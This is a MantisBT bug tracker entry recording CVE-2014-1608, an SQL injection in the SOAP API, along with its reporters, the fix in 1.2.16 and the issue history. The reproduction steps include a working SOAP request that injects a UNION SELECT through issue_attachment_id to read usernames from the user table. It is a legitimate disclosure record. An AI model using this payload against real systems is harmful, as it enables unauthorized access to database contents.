2014-11-27 01:33 EST

View Issue Details Jump to Notes ] Wiki ] Related Changesets ]
IDProjectCategoryView StatusLast Update
0016879mantisbtsecuritypublic2014-02-07 18:24
Reporterdregad 
Assigned Todregad 
PriorityimmediateSeveritymajorReproducibilityhave not tried
StatusclosedResolutionfixed 
Product Version1.1.0a4 
Target Version1.2.16Fixed in Version1.2.16 
Summary0016879: CVE-2014-1608: soap:Envelope SQL injection attack
DescriptionThe SOAP API can be used for SQL injection attacks.

Pasting relevant extracts of the original e-mail report below

-----------------

The xml sent to the soap webservice is sometimes validated, sometimes not. This
is independend from the php.ini and seems to be dependent on the php binary.
The php binaries on the different systems (I used the thoughtpolice images)
differ in the libxml2 version. But I am not quite sure this is the reason.

It is definitely still an issue, but it's not 100% sure whether the
responsibility is 100% at mantisbt.org

the XML request cannot be issued without a user account. The request allows
to read the contents of the entire mantis database no matter what the user's
access permissions are. Mantis often is used with many projects and has a
fine-grain permission structure.
Steps To ReproduceIf you would like to reproduce the issue, you could issue the following
request to a current mantis system (1.2.15) mybe on a recent CentOS image
from thoughtpolice (http://sourceforge.net/projects/thoughtpolicevm/ [^]). This
example uses the administrator account, because it is enabled by default...

<?xml version="1.0" encoding="utf-8"?><soap:Envelope
xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" [^]
xmlns:xsd="http://www.w3.org/2001/XMLSchema" [^]
xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/"><soap:Body><mc_issue_attachment_get [^]
xmlns="http://futureware.biz/mantisconnect"><username>administrator</username><password>root</password><issue_attachment_id>' [^]
UNION SELECT 927,3358,1337,313373,1,1,1,1,1,username,23,42 FROM
mantis_user_table WHERE mantis_user_table.id=1 ORDER BY
bug_id,'true</issue_attachment_id></mc_issue_attachment_get></soap:Body></soap:Envelope>

This request selects the username from mantis_user_table with id=1. The
output is base64-encoded.
Additional InformationThis issue was initially discovered and reported by e-mail by Andrea Barisani from oCERT, on behalf of Martin Herfurt <martin.herfurt@nruns.com>, a security researcher at n.runs professionals GmbH (https://www.nruns.com [^]), who discovered the issue during an audit at a customer's site on an up-to-date machine with the latest Mantis version (1.2.15).
TagsNo tags attached.
Attached Files

- Relationships
related to 0016880closeddregad CVE-2014-1609: SQL injection vulnerabilities 
related to 0016898resolveddregad Dropping deprecated database API function db_query() 
+ Relationships

-  Notes
User avatar

~0039161

dregad (developer)

grangeway quickly identified the root cause and provided a fix for the issue [1]

[1] https://github.com/grangeway/mantisbt/commit/b930f0e44481439ca5bca6b438e55641d139f7e2 [^]
+  Notes

+ Related Changesets

- Issue History
Date Modified Username Field Change
2014-01-24 10:26 dregad New Issue
2014-01-24 10:28 dregad Note Added: 0039161
2014-01-24 10:28 dregad Assigned To => grangeway
2014-01-24 10:28 dregad Status new => confirmed
2014-01-24 10:32 dregad Relationship added related to 0016880
2014-01-24 11:36 dregad Status confirmed => assigned
2014-01-24 11:36 dregad Product Version 1.2.15 => 1.1.0a4
2014-01-24 18:52 dregad Changeset attached => MantisBT master-1.2.x 00b4c170
2014-01-24 18:52 dregad Assigned To grangeway => dregad
2014-01-24 18:52 dregad Status assigned => resolved
2014-01-24 18:52 dregad Resolution open => fixed
2014-01-24 18:52 dregad Fixed in Version => 1.2.16
2014-01-24 18:52 dregad Changeset attached => MantisBT master 3be86ce3
2014-01-28 05:39 dregad Relationship added related to 0016898
2014-02-07 18:21 dregad View Status private => public
2014-02-07 18:24 dregad Status resolved => closed
+ Issue History